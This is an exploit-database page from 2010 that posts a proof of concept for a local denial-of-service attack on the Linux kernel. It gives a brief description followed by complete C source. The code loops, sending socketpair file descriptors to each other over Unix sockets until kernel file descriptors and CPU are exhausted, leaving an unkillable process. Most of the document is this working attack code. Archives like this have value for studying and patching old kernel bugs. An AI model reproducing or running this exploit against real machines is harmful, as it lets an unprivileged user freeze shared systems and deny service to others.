[dos / poc] - Linux Kernel Unix Sockets Local Denial of Serv
Posted on 27 November 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Linux Kernel Unix Sockets Local Denial of Service | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Linux Kernel Unix Sockets Local Denial of Service by Key Night in dos / poc | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>================================================= Linux Kernel Unix Sockets Local Denial of Service ================================================= Simple kernel attack using socketpair. easy, 100% reproductiblle, works under guest. no way to protect :( Simple kernel attack using socketpair. easy, 100% reproductiblle, works under guest. no way to protect :( See source attached. Process become in state 'Running' but not killalble via kill -KILL. eat 100% CPU, eat all available internal file descriptors in kernel :( -- Segmentation fault #include <sys/socket.h> #include <sys/un.h> static int send_fd (int unix_fd, int fd) { struct msghdr msgh; struct cmsghdr *cmsg; char buf[CMSG_SPACE (sizeof (fd))]; memset (&msgh, 0, sizeof (msgh)); memset (buf, 0, sizeof (buf)); msgh.msg_control = buf; msgh.msg_controllen = sizeof (buf); cmsg = CMSG_FIRSTHDR (&msgh); cmsg->cmsg_len = CMSG_LEN (sizeof (fd)); cmsg->cmsg_level = SOL_SOCKET; cmsg->cmsg_type = SCM_RIGHTS; msgh.msg_controllen = cmsg->cmsg_len; memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd)); return sendmsg (unix_fd, &msgh, 0); } int main () { int fd[2], ff[2]; int target; if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd)==-1) return 1; for (;;) { if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1) return 2; send_fd (ff[0], fd[0]); send_fd (ff[0], fd[1]); close (fd[1]); close (fd[0]); fd[0] = ff[0]; fd[1] = ff[1]; } } # <a href='http://1337db.com/'>1337db.com</a> [2010-11-27]</pre></body></html>
